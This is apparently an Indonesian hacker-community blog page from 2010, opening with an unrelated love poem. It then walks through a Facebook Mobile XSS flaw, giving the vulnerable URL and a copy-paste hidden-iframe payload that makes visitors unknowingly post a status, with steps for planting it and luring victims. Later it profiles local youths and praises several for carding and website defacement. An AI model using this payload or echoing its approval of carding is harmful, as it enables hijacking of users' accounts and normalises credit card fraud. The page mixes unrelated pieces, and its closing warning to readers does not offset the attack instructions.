Jujur apa yang sangat aku cintai saat ini. Mau tahu siapa dia? Dia yang selalu menemaniku di saat ku sendiri sepi. Dia yang selalu menerima setiap keluhanku. Dia yang selalu mendengar dan menerima setiap curhatanku.
Ketika ku mulai ada Inspirasi dia selalu ada untukku. Untuk menyimpan semua inspirasi yang aku dapat saat itu. Aku beruntung selalu ada di dekat dia, karena dia semua inspirasiku selalu ada.
Seakan-akan hidup ini tidak berarti apa-apa tanpa dia. Untuk dia, aku tidak mau kehilangannya karena aku sangat mencintainya saat ini
Tidak ada system yang 100% aman. Begitu juga Facebook sebagai satu jejaring social nomor satu di Dunia. Kini pada tanggal 29 Maret 2010 marah terjadi seseorang yang mengupdate status tanpa ia sadari dan bukan si pengguna account yang telah mengupdatenya.
Secara sepintas dan menurut pemikiran masyarakat Awam mungkin ini adalah sesuatu hal yang aneh dan ia berpikir harus cepat-cepat mengganti kata sandi account Facebooknya. Tapi apakah benar seperti itu ? Yu sekarang kita teliti …
Sebenarnya bug-bug di Facebook sudah lama ada, tapi bug itu yang bisa saya dapatkan hanya sebatas bug XSS (Cross Site Scripting). Dibawah ini ada beberapa list bug XSS Facebook yang sudah lama dan sekarang sudah di patch (di tambal) ;
Untuk lebih jelas’a bisa dilihat video di bawah ini ;
Dia atas merupakan bug-bug lama yang sekarang sudah tidak bisa di pergunakan lagi. Tapi bagaimana dengan celah keamanan Facebook yang sekarang. Banyak teman-teman saya yang pada heboh dengan Facebook’a yang mengupdate status sendiri setelah kita mengklik atau mengunjungi website tertentu. Bahkan seorang Dani Firmansyah [a.k.a XnuXer] Sendiripun terkena jebakan itu seperti pernyataan di Facebook’a ia mengeluarkan pernyataan seperti ini :
Hati-hati ada URL berterbangan mangkas fitur LIKE dan POSTING di wall, saya sudah dapetin 2 link yang hampir mirip, nanti saya coba bongkar kodenya di sini. Change password segera…
Kalo seorang XnuXer yang kita kenal sebagai hacking nomor dua setelah Ono W. Purbo menyatakan seperti itu berarti ini merupakan berita besar.
Oke sekarang kita bedah apa yang sebenar’a terjadi dengan orang-orang yang telah meng-update status’a tanpa ia ketahui.
Sebagai contoh coba anda kunjungi website ini ; http://smd.web.id sambil anda membuka account Facebook anda. Setelah itu coba lihat kembali ke Facebook profil anda atau anda refresh kembali halaman profil Facebook anda. Maka akan di dapat anda telah meng-Update status yang seperti ini ;
Terima kasih banyak atas kunjungan kepada situs http://smd.web.id/. Mari kita kerja sama untuk memajukan kota Sumedang di kancah Online
Lho ko bisa gitu? Berarti password saya dah di ambil orang donk?
Hmm… Tidak begitu juga sebenar’a. Semua itu terjadi dari bug XSS yang ada di Facebook Mobile. Dibawah ini letak bug XSS’a ;
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt= <script>alert('Ini adalah bug XSS')</script>
Coba letakan link itu di browser anda kemudian jalankan dengan menekan enter. Maka akan muncul tulisan seperti ini : “Ini adalah bug SXX”.
Nah dari bug itulah yang dimanfaatkan oleh orang-orang yang jail untuk membuat iseng terhadap orang lain. Cara’a seperti ini ;
1. Copas code ini ;
<iframe id="CrazyDaVinci" style="display:none;"
src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function()
{document.forms[0].message.value='Terima kasih banyak atas kunjungan kepada situs http://smd.web.id. Mari kita kerja sama untuk memajukan kota Sumedang di kancah Online';document.forms[0].submit();}</script>"></iframe>
2. Letakan code tersebut di file website anda.
3. Jika code tersebut di letakan di file index berarti anda cukup mengasih link website ke korban.
4. Kalau korban kebetulan sedang membuka Account Facebook’a maka di wall’a ia akan secara otomatis meng-Update tulisan seperti ini “Terima kasih banyak atas kunjungan kepada situs http://smd.web.id. Mari kita kerja sama untuk memajukan kota Sumedang di kancah Online”
Di atas merupakan langkah-langkah’a untuk memanfaatkan bug dari Facebook. Mending kalau pesan’a itu baik atau hanya sebatas pemberitahaun alamat website saja yang biasa di pergunakan oleh para Blogger sebagai teknik SEO model baru. Tapi bagaimana kalau Pesan’a itu adalah merendahkan martabat kita? Wah ini bisa berbahaya, ini nama’a pencemaran nama baik.
Jadi sekarang saya isyaratkan kepada anda semua supaya tidak meng-Klik sembarangan link yang di kasih oleh orang lain. Apalagi oleh orang yang belum anda kenal. Dan bahaya lagi kalau para Pejabat sudah terkena ini, pasti jadai bahan pemberitaan nih.. =)). Pasti pesan’a yang aneh-aneh….
Sumedang sebagai Kota Tahu tidak selamanya harus menjadi kota Tahu. Kami segilintir anak muda ingin menyumbangkan sedikit kreativitas kami untuk tanah kelahiran kami sendiri. Sudah pada saat sekarang kami menyadari Sumedang yang telah dihuni oleh beberapa anak muda yang pernah dan sedang menjalani dunia UnderGround mencoba untuk dan bekerja sama satu sama lain dalam menjadikan Sumedang sebagai Kota Cyber. Setelah melakukan pendataan, ada beberapa anak muda Sumedang yang pernah terjun di dunia Hacker. Diantaranya ;
Author : kaRMa666
Description : Sering aktif di komunitas JarimCrew dan dia sendiri sebagai Admin’a. Keahliannya dalam dunia hacking sudah tidak diragukan lagi, selain melakukan web attack, ia juga sangat lihai dalam dunia Carding, bukan hanya uang dan barang online saja yang ia dapatkan tapi berupa Laptop, notebook dan barang-barang electronic lain’a sudah bisa ia raih dengan skill Carding’a. Ia juga mempunyai Team khusus sesama rekan’a dalam menggeluti dunia’a itu. MX-Brotherhood nama team’a yang tidak lebih dari singkatan The MemeX Brotherhood beralamat di http://mx-brotherhood.com.
Description : Sering ditemui ada di Purnama NET, salah satu warnet depan Kampus SMAN 1 Cimalaka. Ia selalu duduk di bangku Operator’a. Dilihat dalam blog’a terpampang dengan jelas nama YogyaCarederLink, seperti’a ia aktif disana dan dilihat dari thread-thread’a juga dari beberapa Forum Hacker di dapat ia sering share CC. Sudah barang tentu ia terjun di dunia Carding. Selain itu juga ia bisa melakukan teknik Web Attack yang terakhir kali di arshive kan hasil deface’a di InDeVes dan Zona-H dengan belasan website yang telah ia deface melalui berkas-berkas sisa Rooting’a dulu.
Description : Seorang jebolan Nesas [SMKN 1 Sumedang] keluar tahun 2009 dan sekarang lagi kuliah di UIN SGD Bandung. Di kampus’a ia menjabat jadi ketua umum BajaX Community generasi kedua setelah Idham Kholid. BajaX adalah komunitas anak-anak Informatika di UIN yang mempunyai singkatan BarudaX Jaringan Xomputer, official website’a dapat di lihat di alamat http:/bajax.org. Selain itu juga ia menjadi Founder situs http://auk-auk.org yang sekarang dalam masa pengembangan untuk dijadikan sebagai situs yang membahas soal dunia komputer dan internet.
Description : Seorang anak SMK Jurusan TKJ angkatan 2009 di Nesas. Walaupun bisa dikatakan masih muda, tapi skill’a tidak bisa di anggap remeh. Dalam dunia UnderGround ia lahir dari komunitas HN Community [hacker-newbie.org], dan kemudian terus mengembangkan pengetahuan’a, sempat juga membuat forum yang serupa, akan tetapi tidak lama kemudian vacum dan sekarang sudah tidak ada lagi. Kemudian di rekrut untuk menjadi salah satu Administrator forum Medan Hackers yang beralamat di http://medanhackers.org.
Description : Seorang yang mempunyai semangat tinggi untuk menjadikan kota yang di duduki’a bisa lebih maju dalam dunia cyber. Ia yang mempunyai gagasan sekaligus membiayai segala keperluan Official Website SMD Community. Walaupun ia sudah berkeluarga akan tetapi semangat Muda’a masih tetap berkobar.
Description : Sudah lama terjun di dunia UnderGround, Teman-teman’a pun merupakan kumpulan dari generasi awal Forum-Forum Underground yang ada sekarang. Sering’a ia main di IRC, carding yang menjadi makanan sehari-hari. Jikalau ada kebutuhan software yang pro dan harus berbayar pasti giliran ia yang turun tangan.
Keyword : IRC, carding
Contact Us : [FB : http://www.facebook.com/profile.php?id=100000555255512] [YM : sentosa_net]
==cut==
Di dalam pendataan kami mungkin hanya sebagian kecil saja yang bisa kami temukan data’a sedangkan orang-orang di luar sana khusus’a daerah Sumedang masih banyak lagi orang yang terjun ke dalam dunia yang sama. Mudah-mudahan dalam pendataan ini kami dapat mengumpulkan informasi seputar orang yang terjun ke dalam dunia hacking terkhusus di daerah Sumedang yang kedepan’a bisa diharapkan untuk bekerja sama dalam membangun Sumedang sebagai kota Cyber.
matmund 